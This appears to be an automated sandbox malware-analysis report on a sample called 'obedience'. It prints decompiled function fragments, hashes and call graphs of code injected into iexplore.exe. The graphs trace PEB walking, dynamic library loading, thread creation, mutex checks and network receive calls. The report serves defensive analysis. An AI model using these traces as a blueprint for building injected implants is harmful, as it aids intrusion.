      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B190B200ClientRectScreenWindow
      • String ID: )D$)D
      • API String ID: 3682328974-3292006183
      • Opcode ID: 0c8c0fd642da6d5169b2de8b825491a4017b1cc2f6f3e75f77eaa196e2b859e1
      • Instruction ID: d853629e1e9610805d31f89e0e2309f386e532a7c1029cddc8b05386dedac752
      • Opcode Fuzzy Hash: 0c8c0fd642da6d5169b2de8b825491a4017b1cc2f6f3e75f77eaa196e2b859e1
      • Instruction Fuzzy Hash: 47F062B7F011096B8750DE9E88C19AEF7ADEB48214B08457BF918D3312D638ED0587E9
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 68%
      			E0042D6A8(intOrPtr* _a4, signed int _a8) {
      				void* __ebx;
      				void* __esi;
      				void* __ebp;
      				intOrPtr* _t14;
      				intOrPtr _t16;
      				signed int _t17;
      				void* _t18;
      				void* _t19;
      
      				_t17 = _a8;
      				_t14 = _a4;
      				if( *0x49092e != 0) {
      					_t19 = 0;
      					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
      						_t19 = 0x12340042;
      					}
      				} else {
      					_t16 =  *0x49090c; // 0x42d6a8
      					 *0x49090c = E0042D52C(2, _t14, "MonitorFromRect", _t16, _t18);
      					_t19 =  *0x49090c(_t14, _t17);
      				}
      				return _t19;
      			}











      0x0042d6ae
      0x0042d6b1
      0x0042d6bb
      0x0042d6e0
      0x0042d6e9
      0x0042d710
      0x0042d710
      0x0042d6bd
      0x0042d6c2
      0x0042d6cf
      0x0042d6dc
      0x0042d6dc
      0x0042d71b

      APIs
      • GetSystemMetrics.USER32 ref: 0042D6F9
      • GetSystemMetrics.USER32 ref: 0042D705
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MetricsSystem$AddressProc
      • String ID: MonitorFromRect
      • API String ID: 1792783759-4033241945
      • Opcode ID: 18a4978411d993aef22aea4af093b1309794ded8472015a9976919a87443e792
      • Instruction ID: 142e77f389e1ad9ae2035b73dc54c463843e76110aa0c426e94ab48e580e06b5
      • Opcode Fuzzy Hash: 18a4978411d993aef22aea4af093b1309794ded8472015a9976919a87443e792
      • Instruction Fuzzy Hash: 42014BB5B001289FE7108F15F889B66B779EB98355F948177E904DB203D77CEC408BA8
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 48%
      			E0048A918(void* __eax, void* __ebx, void* __eflags) {
      				char _v8;
      				char _v12;
      				char* _t16;
      				intOrPtr* _t17;
      				intOrPtr _t33;
      				intOrPtr _t36;
      
      				_push(0);
      				_push(0);
      				_push(_t36);
      				_push(0x48a990);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t36;
      				E00444928( *((intOrPtr*)(__eax + 0x310)),  &_v12);
      				E00404D4C( &_v8, _v12, "mailto:");
      				_t16 = E00404F00(_v8);
      				_t17 =  *0x48f840; // 0x490b7c
      				_t6 =  *_t17 + 0x30; // 0xe036e
      				ShellExecuteA( *_t6, "open", _t16, 0, 0, 0xa);
      				_pop(_t33);
      				 *[fs:eax] = _t33;
      				_push(0x48a997);
      				E00404A40( &_v12);
      				return E00404A40( &_v8);
      			}

      APIs
      • ShellExecuteA.SHELL32(000E036E,open,00000000,00000000,00000000,0000000A), ref: 0048A96D
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ExecuteShell
      • String ID: mailto:$open
      • API String ID: 587946157-2326261162
      • Opcode ID: 59c07894d3df8b09a49102c22413fb79189a8ad4c2afaa12cd8c139bd5f55ff5
      • Instruction ID: 2051d81a7cc7dd484b594133b7b61de164b48aad915d72833bbc34794b022b8d
      • Opcode Fuzzy Hash: 59c07894d3df8b09a49102c22413fb79189a8ad4c2afaa12cd8c139bd5f55ff5
      • Instruction Fuzzy Hash: 06014F70754304BFE701EB51DC42F5D77A8EB89704F6108B6F600AB691D6B869009A1D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E0043CF58(void* __eax, void* __edx) {
      				char* _t5;
      				void* _t14;
      				void* _t18;
      				long _t19;
      
      				_t18 = __edx;
      				_t14 = __eax;
      				_t5 =  *0x48f73c; // 0x490ae0
      				if( *_t5 == 0 ||  *(__eax + 0x3c) == 0) {
      					return E00404A94(_t18,  *((intOrPtr*)(_t14 + 0x78)));
      				} else {
      					SendMessageA(GetParent( *(__eax + 0x3c)), 0x465, 0x105, _t19);
      					return E00409C4C(_t19, _t18);
      				}
      			}
      0x0043cf60
      0x0043cf62
      0x0043cf64
      0x0043cf6c
      0x00000000
      0x0043cf74
      0x0043cf8b
      0x00000000
      0x0043cf94

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageParentSend
      • String ID: I
      • API String ID: 928151917-299795746
      • Opcode ID: 0142628ee414ed20a919c13fd7383048f05a25e2d4e5df825e8f5212456c81e4
      • Instruction ID: f388f313ec8b4d21780ebb60136cd6795ac0396d1493a1fe681495d92cfa8d28
      • Opcode Fuzzy Hash: 0142628ee414ed20a919c13fd7383048f05a25e2d4e5df825e8f5212456c81e4
      • Instruction Fuzzy Hash: EEE0E5B1B045005BEB54AA6DCCC6B5A328D8B49314F504073B540EF2D2EAB89C81C78A
      Uniqueness

      Uniqueness Score: -1.00%

      Execution Graph

      Execution Coverage:2.8%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:1.6%
      Total number of Nodes:381
      Total number of Limit Nodes:9
      execution_graph 46646 3000019 46648 300002b GetPEB 46646->46648 46652 3000105 46648->46652 46649 3000bd8 46650 3000473 46649->46650 46654 4b5beee 46649->46654 46651 3000abc LoadLibraryA 46651->46652 46652->46649 46652->46650 46652->46651 46655 4b5befe 46654->46655 46656 4b5bef9 46654->46656 46660 4b5bdf8 46655->46660 46672 4b66783 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 46656->46672 46659 4b5bf0c 46659->46650 46661 4b5be04 _Maklocchr 46660->46661 46662 4b5be51 46661->46662 46664 4b5bea1 _Maklocchr 46661->46664 46673 4b5bc94 46661->46673 46662->46664 46725 4b51a94 CreateEventW 46662->46725 46664->46659 46667 4b5bc94 149 API calls 46667->46664 46668 4b51a94 315 API calls 46669 4b5be78 46668->46669 46670 4b5bc94 149 API calls 46669->46670 46671 4b5be81 46670->46671 46671->46664 46671->46667 46672->46655 46674 4b5bca0 _Maklocchr 46673->46674 46675 4b5bd22 46674->46675 46676 4b5bca8 46674->46676 46678 4b5bd83 46675->46678 46681 4b5bd28 46675->46681 46730 4b5e948 HeapCreate 46676->46730 46679 4b5bd88 46678->46679 46682 4b5bde1 46678->46682 46745 4b5eae9 TlsGetValue 46679->46745 46680 4b5bcad 46684 4b5bcb8 46680->46684 46692 4b5bcb1 _Maklocchr 46680->46692 46685 4b5bd46 46681->46685 46681->46692 46740 4b5b86a 66 API calls _Maklocchr 46681->46740 46682->46692 46768 4b5eded 79 API calls 46682->46768 46731 4b5ee5b 86 API calls ~ctype 46684->46731 46690 4b5bd5a 46685->46690 46741 4b66368 67 API calls ~ctype 46685->46741 46744 4b5bd6d 70 API calls 46690->46744 46692->46662 46694 4b5bcbd 46697 4b5bcc1 46694->46697 46702 4b5bccd GetCommandLineA 46694->46702 46732 4b5e966 HeapDestroy 46697->46732 46698 4b5bd50 46742 4b5eb3a 70 API calls ~ctype 46698->46742 46699 4b5bda5 RtlDecodePointer 46707 4b5bdba 46699->46707 46733 4b666ec 71 API calls 2 library calls 46702->46733 46703 4b5bcc6 46703->46692 46704 4b5bd55 46743 4b5e966 HeapDestroy 46704->46743 46709 4b5bdd5 46707->46709 46710 4b5bdbe 46707->46710 46708 4b5bcdd 
46734 4b66123 73 API calls ~ctype 46708->46734 46767 4b58d83 66 API calls ~ctype 46709->46767 46754 4b5eb77 46710->46754 46714 4b5bce7 46716 4b5bceb 46714->46716 46736 4b66631 95 API calls _Maklocchr 46714->46736 46715 4b5bdc5 GetCurrentThreadId 46715->46692 46735 4b5eb3a 70 API calls ~ctype 46716->46735 46719 4b5bcf7 46720 4b5bd0b 46719->46720 46737 4b663bb 94 API calls 2 library calls 46719->46737 46720->46703 46739 4b66368 67 API calls ~ctype 46720->46739 46723 4b5bd00 46723->46720 46738 4b5b667 77 API calls 46723->46738 46810 4b5b95c 46725->46810 46728 4b51ac4 46728->46668 46728->46671 46729 4b51abb WaitForSingleObject 46729->46728 46730->46680 46731->46694 46732->46703 46733->46708 46734->46714 46735->46697 46736->46719 46737->46723 46738->46720 46739->46716 46740->46685 46741->46698 46742->46704 46743->46690 46744->46692 46746 4b5eafe RtlDecodePointer TlsSetValue 46745->46746 46747 4b5bd8d 46745->46747 46746->46747 46748 4b5c6e9 46747->46748 46751 4b5c6f2 46748->46751 46750 4b5bd99 46750->46692 46750->46699 46751->46750 46752 4b5c710 Sleep 46751->46752 46769 4b61f61 46751->46769 46753 4b5c725 46752->46753 46753->46750 46753->46751 46780 4b64030 46754->46780 46756 4b5eb83 GetModuleHandleW 46781 4b65d26 46756->46781 46758 4b5ebc1 InterlockedIncrement 46788 4b5ec19 46758->46788 46761 4b65d26 _Maklocchr 64 API calls 46762 4b5ebe2 46761->46762 46791 4b6025c InterlockedIncrement 46762->46791 46764 4b5ec00 46803 4b5ec22 46764->46803 46766 4b5ec0d _Maklocchr 46766->46715 46767->46692 46768->46692 46770 4b61f6d 46769->46770 46777 4b61f88 46769->46777 46771 4b61f79 46770->46771 46770->46777 46778 4b5c817 66 API calls ~ctype 46771->46778 46773 4b61f9b RtlAllocateHeap 46776 4b61fc2 46773->46776 46773->46777 46774 4b61f7e 46774->46751 46776->46751 46777->46773 46777->46776 46779 4b5e989 RtlDecodePointer 46777->46779 46778->46774 46779->46777 46780->46756 46782 4b65d4e RtlEnterCriticalSection 46781->46782 46783 4b65d3b 46781->46783 46782->46758 46806 4b65c64 66 API calls 3 
library calls 46783->46806 46785 4b65d41 46785->46782 46807 4b5b879 66 API calls 2 library calls 46785->46807 46808 4b65c4d RtlLeaveCriticalSection 46788->46808 46790 4b5ebdb 46790->46761 46792 4b6027d 46791->46792 46793 4b6027a InterlockedIncrement 46791->46793 46794 4b60287 InterlockedIncrement 46792->46794 46795 4b6028a 46792->46795 46793->46792 46794->46795 46796 4b60297 46795->46796 46797 4b60294 InterlockedIncrement 46795->46797 46798 4b602a1 InterlockedIncrement 46796->46798 46800 4b602a4 46796->46800 46797->46796 46798->46800 46799 4b602bd InterlockedIncrement 46799->46800 46800->46799 46801 4b602d8 InterlockedIncrement 46800->46801 46802 4b602cd InterlockedIncrement 46800->46802 46801->46764 46802->46800 46809 4b65c4d RtlLeaveCriticalSection 46803->46809 46805 4b5ec29 46805->46766 46806->46785 46808->46790 46809->46805 46811 4b5b980 46810->46811 46812 4b5b96c 46810->46812 46813 4b5eae9 ~ctype 3 API calls 46811->46813 46836 4b5c817 66 API calls ~ctype 46812->46836 46815 4b5b986 46813->46815 46818 4b5c6e9 ~ctype 66 API calls 46815->46818 46816 4b5b971 46837 4b6071f 11 API calls std::bad_exception::bad_exception 46816->46837 46819 4b5b992 46818->46819 46820 4b5b9e3 46819->46820 46831 4b5eca4 46819->46831 46838 4b58d83 66 API calls ~ctype 46820->46838 46823 4b5b9e9 46828 4b51ab4 46823->46828 46839 4b5c83d 66 API calls ~ctype 46823->46839 46825 4b5eb77 ~ctype 66 API calls 46827 4b5b9a8 CreateThread 46825->46827 46827->46828 46830 4b5b9db GetLastError 46827->46830 46856 4b5b8f7 46827->46856 46828->46728 46828->46729 46830->46820 46840 4b5ec2b GetLastError 46831->46840 46833 4b5ecac 46834 4b5b99f 46833->46834 46854 4b5b879 66 API calls 2 library calls 46833->46854 46834->46825 46836->46816 46837->46828 46838->46823 46839->46828 46841 4b5eae9 ~ctype 3 API calls 46840->46841 46842 4b5ec42 46841->46842 46843 4b5ec98 SetLastError 46842->46843 46844 4b5c6e9 ~ctype 62 API calls 46842->46844 46843->46833 46845 4b5ec56 46844->46845 46845->46843 46846 4b5ec5e 
RtlDecodePointer 46845->46846 46847 4b5ec73 46846->46847 46848 4b5ec77 46847->46848 46849 4b5ec8f 46847->46849 46850 4b5eb77 ~ctype 62 API calls 46848->46850 46855 4b58d83 66 API calls ~ctype 46849->46855 46852 4b5ec7f GetCurrentThreadId 46850->46852 46852->46843 46853 4b5ec95 46853->46843 46855->46853 46857 4b5eae9 ~ctype 3 API calls 46856->46857 46858 4b5b902 46857->46858 46871 4b5eac9 TlsGetValue 46858->46871 46861 4b5b911 46916 4b5eb1d RtlDecodePointer 46861->46916 46862 4b5b93b 46873 4b5ecbe 46862->46873 46864 4b5b956 46909 4b5b8b6 46864->46909 46867 4b5b920 46869 4b5b924 GetLastError RtlExitUserThread 46867->46869 46870 4b5b931 GetCurrentThreadId 46867->46870 46868 4b5b95b 46869->46870 46870->46864 46872 4b5b90d 46871->46872 46872->46861 46872->46862 46875 4b5ecca _Maklocchr 46873->46875 46874 4b5ece2 46878 4b5ecf0 46874->46878 46918 4b58d83 66 API calls ~ctype 46874->46918 46875->46874 46876 4b5edcc _Maklocchr 46875->46876 46917 4b58d83 66 API calls ~ctype 46875->46917 46876->46864 46880 4b5ecfe 46878->46880 46919 4b58d83 66 API calls ~ctype 46878->46919 46882 4b5ed0c 46880->46882 46920 4b58d83 66 API calls ~ctype 46880->46920 46884 4b5ed1a 46882->46884 46921 4b58d83 66 API calls ~ctype 46882->46921 46886 4b5ed28 46884->46886 46922 4b58d83 66 API calls ~ctype 46884->46922 46888 4b5ed36 46886->46888 46923 4b58d83 66 API calls ~ctype 46886->46923 46890 4b5ed47 46888->46890 46924 4b58d83 66 API calls ~ctype 46888->46924 46892 4b65d26 _Maklocchr 66 API calls 46890->46892 46893 4b5ed4f 46892->46893 46894 4b5ed74 46893->46894 46895 4b5ed5b InterlockedDecrement 46893->46895 46926 4b5edd8 RtlLeaveCriticalSection _Maklocchr 46894->46926 46895->46894 46896 4b5ed66 46895->46896 46896->46894 46925 4b58d83 66 API calls ~ctype 46896->46925 46898 4b5ed81 46899 4b65d26 _Maklocchr 66 API calls 46898->46899 46901 4b5ed88 46899->46901 46902 4b5edb9 46901->46902 46927 4b602eb 8 API calls 46901->46927 46929 4b5ede4 RtlLeaveCriticalSection _Maklocchr 46902->46929 46905 4b5edc6 
46930 4b58d83 66 API calls ~ctype 46905->46930 46907 4b5ed9d 46907->46902 46928 4b60384 66 API calls 2 library calls 46907->46928 46910 4b5b8c2 _Maklocchr 46909->46910 46911 4b5eca4 _Maklocchr 66 API calls 46910->46911 46912 4b5b8c7 46911->46912 46931 4b4d64e 46912->46931 46936 4b5199b 46912->46936 46913 4b5b8d1 46916->46867 46917->46874 46918->46878 46919->46880 46920->46882 46921->46884 46922->46886 46923->46888 46924->46890 46925->46894 46926->46898 46927->46907 46928->46902 46929->46905 46930->46876 46960 4b45901 46931->46960 46934 4b4d66e 46934->46913 46937 4b519b0 46936->46937 46937->46937 46938 4b519bf CreateMutexW GetLastError 46937->46938 46939 4b519df 46938->46939 46940 4b519d9 46938->46940 47018 4b51943 WSAStartup 46939->47018 47015 4b5b83e 46940->47015 46947 4b51a90 46947->46913 46950 4b4c391 78 API calls 46951 4b51a0a 46950->46951 46952 4b4c391 78 API calls 46951->46952 46953 4b51a30 46952->46953 47071 4b4d54b 77 API calls 46953->47071 46955 4b51a37 46956 4b4c391 78 API calls 46955->46956 46957 4b51a62 46956->46957 46958 4b4d64e 295 API calls 46957->46958 46959 4b519e8 Mailbox 46958->46959 47072 4b58e89 46959->47072 46961 4b45912 WaitForSingleObject 46960->46961 46962 4b4590d 46960->46962 46961->46962 46962->46934 46963 4b458cc 46962->46963 46964 4b458d7 46963->46964 46965 4b458db CreateThread 46963->46965 46964->46934 46965->46964 46966 4b4d58d 46965->46966 46969 4b4ce76 46966->46969 46968 4b4d598 46970 4b4c609 LoadLibraryW GetProcAddress GetProcAddress FreeLibrary 46969->46970 46981 4b4ceb3 Mailbox 46970->46981 46971 4b4ce23 68 API calls 46971->46981 46972 4b4b277 77 API calls 46972->46981 46973 4b4c65a 222 API calls 46973->46981 46974 4b4b252 77 API calls 46974->46981 46975 4b46275 79 API calls 46975->46981 46976 4b4a828 112 API calls 46978 4b4cf4a Sleep 46976->46978 46977 4b4c62e 76 API calls 46977->46981 46982 4b4aeb7 67 API calls 46978->46982 46979 4b4afbf 77 API calls 46979->46981 46980 4b51187 GetExitCodeProcess 46980->46981 46981->46971 
46981->46972 46981->46973 46981->46974 46981->46975 46981->46976 46981->46977 46981->46979 46981->46980 46983 4b4d33f Sleep 46981->46983 46984 4b4d01e 46981->46984 46987 4b4d004 Sleep 46981->46987 46988 4b5023f 9 API calls 46981->46988 46990 4b4d376 GetTickCount 46981->46990 46991 4b4580f 116 API calls 46981->46991 46993 4b4aeb7 67 API calls 46981->46993 46995 4b4d125 Sleep 46981->46995 46996 4b5076e TerminateThread CloseHandle CloseHandle CloseHandle 46981->46996 46999 4b58dbd 77 API calls 46981->46999 47000 4b4a828 112 API calls 46981->47000 47004 4b4a828 112 API calls 46981->47004 47005 4b58d83 66 API calls ~ctype 46981->47005 47008 4b4d303 Sleep 46981->47008 46982->46981 46985 4b4aeb7 67 API calls 46983->46985 46984->46981 46986 4b4c389 19 API calls 46984->46986 46989 4b4d4d7 Sleep 46984->46989 46994 4b594a0 66 API calls 46984->46994 46997 4b4c62e 76 API calls 46984->46997 47001 4b4c62e 76 API calls 46984->47001 47003 4b51b99 closesocket TerminateThread 46984->47003 47007 4b4c62e 76 API calls 46984->47007 47010 4b50a1b closesocket closesocket closesocket closesocket TerminateThread 46984->47010 47011 4b4c62e 76 API calls 46984->47011 47012 4b4c62e 76 API calls 46984->47012 47014 4b55730 87 API calls 46984->47014 46985->46984 46986->46981 46987->46981 46987->46984 46988->46981 46989->46981 46992 4b5948e 66 API calls 46990->46992 46991->46981 46992->46984 46993->46981 46994->46984 46995->46981 46995->46984 46996->46981 46998 4b4d222 TerminateThread 46997->46998 46998->46981 46999->46981 47000->46981 47002 4b4d291 TerminateThread 47001->47002 47002->46981 47003->46984 47006 4b4d453 QueueUserWorkItem 47004->47006 47005->46981 47006->46981 47009 4b4d2b6 TerminateThread 47007->47009 47008->46981 47009->46981 47010->46984 47011->46984 47013 4b4d2de TerminateThread 47012->47013 47013->46981 47014->47008 47080 4b5b6fe 66 API calls 2 library calls 47015->47080 47017 4b5b84f 47017->46939 47019 4b5196c 47018->47019 47021 4b51982 47018->47021 47020 4b51987 WSACleanup 
47019->47020 47019->47021 47020->47021 47022 4b58e89 ctype 5 API calls 47021->47022 47023 4b51999 47022->47023 47023->46959 47024 4b4c391 47023->47024 47025 4b4c3a0 47024->47025 47026 4b4c3b8 47024->47026 47081 4b4d599 78 API calls 47025->47081 47030 4b4d673 47026->47030 47028 4b4c3ae 47082 4b5ace5 76 API calls 47028->47082 47031 4b4e5c0 47030->47031 47032 4b4d6aa GetTickCount 47031->47032 47083 4b5948e 47032->47083 47036 4b4d6f9 47037 4b4d774 47036->47037 47038 4b4d715 47036->47038 47040 4b58dbd 77 API calls 47037->47040 47041 4b4d734 47038->47041 47045 4b4d74f 47038->47045 47046 4b4d71b 47038->47046 47039 4b594a0 66 API calls 47042 4b4d6ca 47039->47042 47044 4b4d77b 47040->47044 47043 4b58dbd 77 API calls 47041->47043 47042->47036 47042->47039 47096 4b4d4df 77 API calls 47042->47096 47049 4b4d740 47043->47049 47048 4b4d780 47044->47048 47044->47049 47050 4b58dbd 77 API calls 47045->47050 47051 4b4d78f CreateEventW 47046->47051 47097 4b58dbd 47046->47097 47110 4b57652 67 API calls 47048->47110 47049->47051 47050->47049 47111 4b42e58 CloseHandle 47051->47111 47056 4b4d7a3 47070 4b4d7b1 Mailbox 47056->47070 47089 4b4c62e 47056->47089 47057 4b4d788 47057->47049 47058 4b4d72a 47109 4b57652 67 API calls 47058->47109 47060 4b58e89 ctype 5 API calls 47063 4b4d801 47060->47063 47061 4b4d732 47061->47041 47063->46950 47063->46959 47067 4b4c62e 76 API calls 47068 4b4d7d5 47067->47068 47112 4b54b2a 132 API calls 47068->47112 47070->47060 47071->46955 47073 4b58e91 47072->47073 47074 4b58e93 IsDebuggerPresent 47072->47074 47073->46947 47138 4b69cc7 47074->47138 47077 4b5ea7e SetUnhandledExceptionFilter UnhandledExceptionFilter 47078 4b5eaa3 GetCurrentProcess TerminateProcess 47077->47078 47079 4b5ea9b ctype 47077->47079 47078->46947 47079->47078 47080->47017 47081->47028 47082->47026 47084 4b5eca4 _Maklocchr 66 API calls 47083->47084 47085 4b4d6c4 47084->47085 47086 4b594a0 47085->47086 47087 4b5eca4 _Maklocchr 66 API calls 47086->47087 47088 4b594a5 47087->47088 47088->47042 
47090 4b4c655 47089->47090 47091 4b4c63d 47089->47091 47093 4b51e1b 47090->47093 47113 4b5ace5 76 API calls 47091->47113 47114 4b51b4a 47093->47114 47096->47042 47099 4b58dc7 47097->47099 47100 4b4d725 47099->47100 47105 4b58de3 47099->47105 47117 4b593fa 47099->47117 47134 4b5e989 RtlDecodePointer 47099->47134 47100->47041 47100->47058 47102 4b58e21 47136 4b58cbe 66 API calls std::bad_exception::bad_exception 47102->47136 47104 4b58e2b 47137 4b58e3d RaiseException 47104->47137 47105->47102 47135 4b5ace5 76 API calls 47105->47135 47108 4b58e3c 47109->47061 47110->47057 47111->47056 47112->47070 47113->47090 47115 4b51af8 6 API calls 47114->47115 47116 4b4d7c8 47115->47116 47116->47067 47116->47070 47118 4b59477 47117->47118 47127 4b59408 47117->47127 47119 4b5e989 std::bad_exception::bad_exception RtlDecodePointer 47118->47119 47121 4b5947d 47119->47121 47120 4b59413 47122 4b5f34b std::bad_exception::bad_exception 65 API calls 47120->47122 47126 4b5f19c std::bad_exception::bad_exception 65 API calls 47120->47126 47120->47127 47130 4b5b5e6 std::bad_exception::bad_exception GetModuleHandleW GetProcAddress ExitProcess 47120->47130 47123 4b5c817 ~ctype 65 API calls 47121->47123 47122->47120 47125 4b5946f 47123->47125 47124 4b59436 RtlAllocateHeap 47124->47125 47124->47127 47125->47099 47126->47120 47127->47120 47127->47124 47128 4b59463 47127->47128 47131 4b5e989 std::bad_exception::bad_exception RtlDecodePointer 47127->47131 47132 4b59461 47127->47132 47129 4b5c817 ~ctype 65 API calls 47128->47129 47129->47132 47130->47120 47131->47127 47133 4b5c817 ~ctype 65 API calls 47132->47133 47133->47125 47134->47099 47135->47102 47136->47104 47137->47108 47138->47077 47139 300069b 47140 3000c1b 47139->47140 47142 4b5beee 379 API calls 47140->47142 47141 3000c44 47142->47141

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 571 3000019-3000029 572 300003a-3000044 571->572 573 30000d0-3000103 GetPEB 572->573 574 300004a-300005f 572->574 575 3000105-3000114 573->575 576 3000061-3000077 574->576 577 30000cb 574->577 575->575 579 3000116-300011f 575->579 576->577 580 3000079-300008e 576->580 577->572 579->575 581 3000121-3000471 579->581 580->577 582 3000090-30000a6 580->582 591 3000473 581->591 592 3000478-300048c 581->592 582->577 583 30000a8-30000c9 582->583 583->573 593 3000c83-3000c89 591->593 594 3000493-30004a2 592->594 595 300048e 592->595 596 30004a4 594->596 597 30004a9-30004c1 594->597 595->593 596->593 598 30004c3 597->598 599 30004c8-30004d5 597->599 598->593 600 30004d7 599->600 601 30004dc-30004e6 599->601 600->593 602 30004e8 601->602 603 30004ed-30004fa 601->603 602->593 604 3000501-3000516 603->604 605 30004fc 603->605 606 3000527-3000534 604->606 605->593 607 3000562-300056d 606->607 608 3000536-3000559 606->608 611 3000574-30005a0 607->611 612 300056f 607->612 609 3000560 608->609 610 300055b 608->610 609->606 610->593 614 30005b1-30005be 611->614 612->593 615 30005c4-30005fc 614->615 616 3000669-300066d 614->616 619 300060c-3000612 615->619 620 30005fe-300060a 615->620 617 3000674-3000694 616->617 618 300066f 616->618 626 30006a0-30006f0 617->626 627 3000696 617->627 618->593 621 3000618-3000659 619->621 620->621 623 3000664 621->623 624 300065b-3000661 621->624 623->614 624->623 628 3000701-300070d 626->628 627->593 629 300072d-3000737 628->629 630 300070f-300072b 628->630 632 3000748-3000755 629->632 630->628 633 3000806-3000834 632->633 634 300075b-300076c 632->634 635 3000983-30009af 633->635 636 300083a-3000844 633->636 637 3000781 634->637 638 300076e-300077f 634->638 640 30009b1 635->640 641 30009bb-30009c7 635->641 636->635 642 300084a-3000865 636->642 639 3000739-3000742 637->639 638->637 643 3000783-30007a9 638->643 639->632 640->641 645 30009cd-30009d6 641->645 646 300086b-300087c 642->646 644 30007ba-30007d0 643->644 647 3000801 
644->647 648 30007d2-30007ff 644->648 649 3000bd8-3000be9 645->649 650 30009dc-3000a2e 645->650 646->635 651 3000882-30008af 646->651 647->639 648->644 653 3000c01-3000c41 call 4b5beee 649->653 654 3000beb-3000bfc 649->654 655 3000a3f-3000a49 650->655 656 30008c0-30008cc 651->656 674 3000c44-3000c51 653->674 654->593 657 3000a4b-3000a5c 655->657 658 3000a7d-3000a87 655->658 659 30008d2-30008ee 656->659 660 3000969-300097e 656->660 663 3000a60-3000a7b 657->663 664 3000a5e 657->664 665 3000a95-3000a9b 658->665 666 3000a89-3000a93 658->666 667 30008f0 659->667 668 30008f2-300090e 659->668 660->646 663->655 664->658 670 3000aa3-3000aba 665->670 666->670 671 3000964 667->671 668->671 672 3000910-3000962 668->672 678 3000abc-3000ad3 LoadLibraryA 670->678 679 3000adf-3000ae9 670->679 671->656 672->671 676 3000c53-3000c79 674->676 677 3000c7b 674->677 676->593 677->593 678->679 680 3000ad5 678->680 681 3000afa-3000b0a 679->681 680->679 683 3000b11-3000b30 681->683 684 3000b0c-3000bd3 681->684 687 3000b32-3000b5b 683->687 688 3000b5d-3000b8f 683->688 684->645 691 3000b95-3000b9c 687->691 688->691 692 3000bb5 691->692 693 3000b9e-3000bb3 691->693 694 3000bbf 692->694 693->694 694->681
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: GetP$rocA
      • API String ID: 0-699337948
      • Opcode ID: bddaf1d6c04482fb7e6e334e95170fc2cb22990af294f9a72044e07683721cef
      • Instruction ID: a9e59fde95dd183e9af08fffbce9d2377712290c1d5c534921b105e59458b5ba
      • Opcode Fuzzy Hash: bddaf1d6c04482fb7e6e334e95170fc2cb22990af294f9a72044e07683721cef
      • Instruction Fuzzy Hash: 7582F370E09268CFEB65CB18C898BEDBBB2AF4A304F0481D9D4896B381C7755E94CF55
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • recv.WS2_32(?,?,?,00000000), ref: 04B43A81
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: recv
      • String ID:
      • API String ID: 1507349165-0
      • Opcode ID: 57ce3cbf28754c8469ded03f7e26a795b4c447aa47246455f957f2737c1c22a5
      • Instruction ID: d204ca2ab5466024dcb116c656fda48bb1683559354a6d82d2f55f0bc4874f43
      • Opcode Fuzzy Hash: 57ce3cbf28754c8469ded03f7e26a795b4c447aa47246455f957f2737c1c22a5
      • Instruction Fuzzy Hash: 86F090323442147BDB048969DC81EAE3BEDEBC9770F24466AF915C61D0E2B1AD41A7A0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
